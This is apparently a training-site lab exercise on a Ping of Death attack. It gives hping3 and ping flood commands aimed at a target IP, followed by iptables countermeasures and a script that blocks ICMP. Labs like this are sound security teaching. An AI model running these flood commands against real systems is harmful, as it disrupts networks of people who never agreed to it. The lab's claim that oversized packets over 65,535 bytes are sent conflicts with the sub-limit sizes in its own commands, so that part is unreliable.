Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 61: Conducting a Ping of Death Attack

by | Jul 25, 2025 | 0 comments

Objective

Simulate a Ping of Death (PoD) attack to understand how oversized ICMP packets exploit vulnerabilities in network protocols. Learn how to monitor system behavior during the attack, implement countermeasures, and explore how modern systems defend against such attacks.

Scenario

The Ping of Death is a denial-of-service (DoS) attack where an attacker sends oversized ICMP packets to a target system, causing crashes, freezes, or reboots due to buffer overflow vulnerabilities. This attack was historically effective against older systems, but modern operating systems include protections. This exercise will demonstrate how such an attack works and how to mitigate it.

⚠️ Important: Perform this exercise in a controlled environment. Do not target unauthorized systems. Unauthorized network attacks are illegal and unethical.

Lab Instructions

Step 1: Prepare the Testing Environment

a. Set Up Target and Attacker Machines

  • Target Machine: Linux/Windows VM (unpatched or legacy system for testing purposes).
  • Attacker Machine: Kali Linux or any Linux distribution with hping3 installed.

b. Install hping3 on the Attacker Machine

sudo apt update
sudo apt install hping3 -y

Step 2: Conduct the Ping of Death Attack

a. Send Oversized ICMP Packets with hping3

sudo hping3 -1 -c 1000 -d 65500 <target-ip>
  • Explanation:
    • -1: ICMP mode.
    • -c 1000: Send 1,000 packets.
    • -d 65500: Set payload size to 65,500 bytes (oversized packet).

b. Alternative Method Using ping (if supported)

ping -s 65507 <target-ip>
  • Note: Modern ping utilities may prevent sending oversized packets.

c. Monitor Target Machine Behavior

  • Check if the target becomes unresponsive, slows down, or crashes.
  • Use system logs to detect errors:
dmesg | grep -i icmp

Step 3: Implement Countermeasures

a. Block ICMP Traffic Using iptables (Linux)

sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP

b. Limit ICMP Packet Size

sudo iptables -A INPUT -p icmp --icmp-type echo-request -m length --length 0:128 -j ACCEPT
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP

c. Enable Firewall on Windows

  • Go to Control PanelSystem and SecurityWindows Defender Firewall.
  • Block incoming ICMP Echo Requests.

d. Restart Firewall Services

sudo systemctl restart iptables

Step 4: Test the Effectiveness of Countermeasures

a. Re-run the PoD Attack

sudo hping3 -1 -c 1000 -d 65500 <target-ip>
  • Expected Result: The attack is blocked, and the system remains stable.

b. Verify Firewall Rules

sudo iptables -L -v -n
  • Expected Result: ICMP traffic is filtered.

Step 5: Discuss Modern Protections Against PoD

  1. OS-Level Protections:
    • Modern operating systems prevent oversized packet processing.
  2. Firewall and IDS/IPS:
    • Network devices drop malformed packets.
  3. Input Validation:
    • Network stacks validate packet sizes and content.
  4. Regular Patching:
    • Timely OS and firmware updates mitigate vulnerabilities.

Solution & Explanation

How Ping of Death Works

  • Exploits the inability of a system to handle oversized ICMP packets (> 65,535 bytes).
  • Causes buffer overflows, leading to system instability or crashes.

Why It Was Dangerous

  • Buffer Overflow: Overwrites system memory.
  • DoS Impact: Renders the target unresponsive.
  • Remote Exploitability: Required no authentication.

Mitigation Techniques

  1. Firewall Rules: Block or limit ICMP traffic.
  2. System Updates: Patch OS and firmware.
  3. Input Validation: Validate packet sizes at the network stack.

Testing & Verification

  1. Before Mitigation:
    • Target is vulnerable to oversized ICMP packets.
    • System may slow down, crash, or reboot.
  2. After Mitigation:
    • Firewall blocks oversized ICMP packets.
    • System remains stable.

Verify Firewall Rules

sudo iptables -L -v -n

System Stability Check

  • Monitor CPU and memory usage:
top
  • Check system logs:
dmesg | grep -i icmp

Security Best Practices

  1. Apply Regular OS and Firmware Updates.
  2. Use Firewalls to Block or Limit ICMP Traffic.
  3. Deploy IDS/IPS to Detect and Prevent Malformed Packets.
  4. Enable Input Validation in Network Stacks.
  5. Monitor Network Traffic for Anomalies.

Additional Script (Optional)

Automate ICMP Blocking:

#!/bin/bash
# Block ICMP Echo Requests
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
sudo iptables-save > /etc/iptables/rules.v4

echo "ICMP Echo Requests are now blocked."

Run the script:

chmod +x block_icmp.sh
sudo ./block_icmp.sh

Conclusion

In this exercise, you simulated a Ping of Death (PoD) attack using hping3 to send oversized ICMP packets, observed its impact on the target system, and implemented effective countermeasures. Regular patching, proper firewall configurations, and modern system protections are critical to defending against legacy and emerging network-based attacks.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *